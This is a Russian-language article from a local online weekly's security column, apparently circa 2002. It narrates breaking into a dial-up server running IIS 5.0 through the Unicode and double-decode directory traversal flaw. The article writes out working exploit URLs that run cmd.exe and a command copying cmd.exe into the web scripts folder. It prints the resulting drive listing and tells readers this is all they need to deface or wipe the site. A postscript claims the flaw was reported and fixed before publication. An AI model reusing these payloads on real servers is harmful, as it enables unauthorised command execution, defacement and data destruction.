Еженедельник Свет в Интернет

Главная

Новости

Статьи и обзоры
  Горожанин
  Обнинск в Internet
  Web Design
  Hardware
  Software
  Безопасность
  Серфинг
  Игродром
  Relax
  Технологии
  Web-обзор
  Интернет-ликбез
  Опросник
  УП-Технологии
  ART.net

Ссылки

Архив

О нас

Контакты

Форумы


Основатель:
К.Николаенко

Главный Редактор:
С.Коротков

Web Design:
Neutron


Наш спонсор






Порт POPULAR.RU
POPULAR.RU RegionalBanner Network.






Океан


НПП Метра - промышленные электронные автомобильные вагонные весы
Goldy Interior - салон офисной мебели: кабинеты руководителей, мебель для персонала

= Безопасность =

БДИТЕЛЬНОСТЬ НИКОГДА НЕ БЫВАЕТ ЛИШНЕЙ

miller miller@bratva.ru

 

Дело было вечером... Погода пасмурная, сидел я перед монитором, уткнувшись в синий квадрат под названием "рабочий стол". Тут по аське стучится тип и просит проверить его на защищенность :), ссылаясь на то, что у него дырявая аська и т.п. (Ник спрятан, но те, кому надо, поймут, о ком идет речь - далее он будет Юрой) :). Ну я не долго думая, смотрю, какой у него IP, чтобы проверить его на защищенность. IP был - 62.148.***.***. Узнаю у Юры, что он подключен через модем к dial-up некоего сервера. Меня это сильно заинтересовало и я начал поиски первых дыр. Просканировав порты, увидел открытый 80-й порт и начал в него “стучаться”. Веб-сервер был Microsoft-IIS/5.0. Обрадовавшись и вспомнив такую великую вещь как unicode, попробовал его на деле. Попробовал несколько скриптов: нашлось два, может их и больше, но я пишу только ДВА :)

http://***-***.obninsk.com:80/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

http://***.***-***.obninsk.com:80/scripts/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

По умолчанию вы попадаете в папку c:\inetpub\wwwroot\... Каждый, кто знает чуть-чуть ms-dos, поймет, по какому принципу строится ссылка. Изменяя конец :) ссылки, вы будете попадать в разные папки сервера, так же можно просматривать не только диск c:, но и d: и т.д. Скопировав в папку scripts файл cmd.exe, я сократил ссылку в два раза - теперь она выглядит вот так:

http://****.obninsk.com/scripts/cmd1.exe?/c+dir+c:\ :

а сделал я это ТАК:

http://***-***.obninsk.com:80/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+ copy+c:\winnt\system32\cmd.exe+cmd1.exe.

Теперь уж мы облегчили жизнь себе на столько, на сколько это возможно :) Вот содержимое диска C:

17.03.2002  20:06       <DIR>          FOUND.000
17.03.2002  20:08       <DIR>          WINNT
17.03.2002  20:15       <DIR>          Documents and Settings
17.03.2002  20:16       <DIR>          Program Files
17.03.2002  20:39       <DIR>          Inetpub
17.03.2002  21:03       <DIR>          WinGate 4.01
01.08.2002  09:54       72 192          httpodbc.dll
19.08.2002  19:52       <DIR>          exch
               1 файлов         72 192 байт
               7 папок     683 540 480 байт свободно

Я рассказал вам все, что нужно, чтобы продолжить дефейс или потереть все к чертям:) А пока можно посмотреть на ЭТО:

скриншот

И вообще-то всем удачи и Don't worry, be happy :))))) Программы, которые использовались для взлома: SuperScan и ослик IE :)

P.S. пишите, предлагайте темы: все скажем, все расскажем :)

P.P.S. Редакция газеты предупредила администрацию сайта о найденной уязвимости до публикации этой статьи, и на данный момент указанная уязвимость устранена. Другим же админам описанный случай должен пойти впрок:)

Реальные IP-адреса в статье были заменены по просьбе пострадавших...

ССЫЛКИ ПО ТЕМЕ

Уязвимость unicode в IIS 4.0/5.0

Copyright © Свет в Internet   Designed by Свет в Internet